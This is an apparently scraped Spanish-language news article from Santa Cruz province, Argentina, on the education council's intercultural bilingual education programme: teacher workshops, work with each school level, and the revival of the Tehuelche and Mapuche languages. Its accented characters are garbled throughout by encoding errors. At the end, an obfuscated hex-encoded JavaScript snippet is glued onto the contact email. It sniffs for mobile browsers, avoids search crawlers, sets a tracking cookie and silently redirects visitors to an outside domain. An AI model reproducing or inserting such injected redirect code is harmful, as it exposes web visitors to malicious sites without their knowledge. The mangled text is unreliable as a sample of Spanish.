Desde la modalidad de educaciA?n intercultural bilingA?e se proyecta la agenda del aAi??o

El Gobierno de Santa Cruz, a travAi??s del CPE, impulsa acciones polAi??tico educativas que apuntan a fortalecer la EducaciA?n Intercultural en la Provincia. La CoordinaciA?n Provincial de MEIB organiza el trabajo del aAi??o para todos los niveles y modalidades.

La Lic. Marcela Alaniz, coordinadora provincial de la Modalidad de EducaciA?n Intercultural BilingA?e del Consejo Provincial de EducaciA?n, compartiA? detalles del trabajo que desarrollarA? a lo largo del aAi??o dirigido a cada uno de los niveles y modalidades del sistema educativo.

La modalidad existe como parte del Consejo Provincial de EducaciA?n desde el aAi??o 2010. La Coordinadora comentA?: “Fuimos construyendo en funciA?n de nuestra propia realidad como provincia, unas lAi??neas de trabajo determinadas” y aclarA? que “la EducaciA?n Cultural BilingA?e es un derecho de las comunidades, estA? en la Ley Nacional de EducaciA?n,
pero cada jurisdicciA?n define su trabajo de acuerdo a su realidad; es el caso de Salta, Misiones o Chaco y Formosa donde tienen polAi??ticas muy vinculadas al bilingA?ismo porque en esas provincias hay comunidades
que hablan fluidamente su lengua materna, entonces los desafAi??os tienen que ver con la igualdad entre las lenguas y el material educativo bilingA?e, y la formaciA?n de docentes en este sentido. A medida que vamos bajando hacia Patagonia las realidades van cambiando”.

Con respecto a la realidad socio-lingA?Ai??stica originaria en Santa Cruz, la Lic. Alaniz seAi??alA? que “tenemos un desafAi??o totalmente diferente que tiene que ver con recuperaciA?n y revitalizaciA?n de lenguas ancestrales
que prA?cticamente han dejado de hablarse”. Entonces en nuestro caso, “la tarea consiste en acompaAi??ar y propiciar procesos de recuperaciA?n de las lenguas tehuelche (aonikenk) y mapuche (mapudungA?n), que son muy complejos pero
se mueven en funciA?n del deseo de las personas de que no se pierdan”. Para esto se trabaja con el asesoramiento de lingA?istas y de profesionales que tienen experiencia en este tipo de procesos.

Entre las principales acciones de la modalidad, figura el encuentro con docentes y estudiantes. En el primer caso, a travAi??s de “dispositivos de capacitaciA?n en talleres, donde compartimos una serie de contenidos, y brindamos herramientas para que los profesores puedan innovar en los materiales”, informA? la Coordinadora.

Para los talleres se convoca a dos docentes y un directivo por instituciA?n, concretando encuentros en zona norte, centro y sur (a veces se agrupa a las instituciones de centro y sur). Son Ai??stos ai???espacios de sensibilizaciA?n que tienen que ver con pensar nuestra historia; y surgen cosas muy interesantes porque muchos de los participantes tienen en su propia historia alguna conexiA?n con el mundo indAi??gena, mA?s o menos conocida”, seAi??alA? la Lic. Alaniz.
Un segundo momento estA? relacionado con ai???las cuestiones de los contenidos, nos interesa mucho ver el material circulante, es decir, cA?mo trabajamos la temA?tica pueblos originarios en cada nivel; revisamos el discurso que tienen esos textos y luego los ponemos en tensiA?n con las nuevas miradas de la historia”.

En dichos encuentros, agregA? la Coordinadora, ai???casi siempre hay participaciA?n de los miembros de las comunidades de pueblos originarios, eso le da otro valor a cualquiera de nuestras actividades”.

Sobre los textos, explicA? la Coordinadora que no hay mucha producciA?n editorial desde la nueva perspectiva del revisionismo. “Los pocos materiales educativos que existen, que afortunadamente los tenemos, y son muy buenos, tratamos de acercarlos a los profesores para que los conozcan y se familiaricen con ellos, y puedan trasladarlos en actividades con los estudiantes”, relatA?.

El Prof. Federico Gerli, integrante del equipo tAi??cnico de la modalidad, manifestA? en cuanto a este trabajo que se sumarA? una propuesta virtual de formaciA?n con eje en las trayectorias histA?ricas de los pueblos originarios en Santa Cruz, “teniendo en cuenta no solamente a los profesores de todos los niveles, sino tambiAi??n respondiendo a la
cuestiA?n del desconocimiento de los procesos histA?ricos en la provincia respecto a las comunidades originarias”.

LOS ALUMNOS

La tarea con cada uno de los niveles educativos implica desafAi??os diferentes. En el caso del Nivel Inicial el interAi??s estA? puesto en trabajar la cuestiA?n del estereotipo, es decir, ai???en contarles a los chicos que los pueblos originarios existen y no son un dibujito animado, ellos son personas como todos nosotros; propiciamos encuentros con miembros de las comunidades de pueblos originarios, tratamos de generar ese puente en cada una de las localidades, y tiene un resultado maravilloso este aprendizaje significativo”, afirmA?.

En el Nivel Primario, la mirada apunta especialmente al abordaje del tema de los pueblos originarios de Santa Cruz, en el 4Ai?? Grado. Mientras que en Nivel Secundario, ai???nos interesa ver, por ejemplo, cuA?l es la mirada desde el tema de la campaAi??a del desiertoai???. El Prof. Gerli destacA? que se hace especial hincapiAi?? en el tratamiento ai???desde una
mirada crAi??tica de los textos que estA?n circulando, y los chicos rA?pidamente detectan (el tipo de discurso), tienen una predisposiciA?n al anA?lisis crAi??tico”.

En cuanto al Nivel Superior, la Licenciada anunciA?: ai???Tenemos previsto encontrarnos con los estudiantes de los Institutos del sistema educativo provincial y tambiAi??n de la Universidad Nacional de la Patagonia Australai???. RescatA?
la trayectoria de formaciA?n brindada en el A?mbito universitario al decir: ai???Fuimos invitados a dictar seminarios en San JuliA?n, RAi??o Gallegos, Rio Turbio y Caleta Olivia; afortunadamente estamos en contacto con el sistema formador porque esto lo tenemos que reforzar con todos los actores y los futuros docentes son muy importantesai???.

Respecto a la tarea de sensibilizaciA?n, Alaniz considerA? que ai???muchas veces esto implica una transformaciA?n en las prA?cticas bastante importante, y eso es lo que queremos lograr; el punto es identificar por quAi?? tenemos tan internalizadas algunas nociones, ofrecer nuevas herramientas y fundamentalmente plantearles a los docentes que no estA?n solos, que nosotros estamos para acompaAi??arlos en la construcciA?n de una propuesta pedagA?gica innovadora, en un acto escolar que quieran realizar, para contactarlos con los pueblos originarios de su regiA?n y
que vivan esa experienciaai???.

El recorrido de la coordinaciA?n permitiA? ai???generar unos vAi??nculos muy lindos con los profesores que tienen inquietudes, y esto ocurre a lo largo de toda la provinciaai???, subrayA? la Coordinadora e invitA? a que visiten la
pA?gina web del CPE donde se accede a un material que fue seleccionado especialmente: educacionsantacruz.gov.ar (GestiA?n Educativa, Modalidades, MEIB). Los docentes interesados en comunicarse con la modalidad pueden acercarse a las oficinas de Santiago del Estero 817 (8:00 a 17:00), en RAi??o Gallegos; y, a la oficina anexa del JardAi??n de Infantes NAi?? 18, MadroAi??al 530, en Caleta Olivia. O vAi??a correo electrA?nico escribiendo a meib.santacruz@yahoo.com.arvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}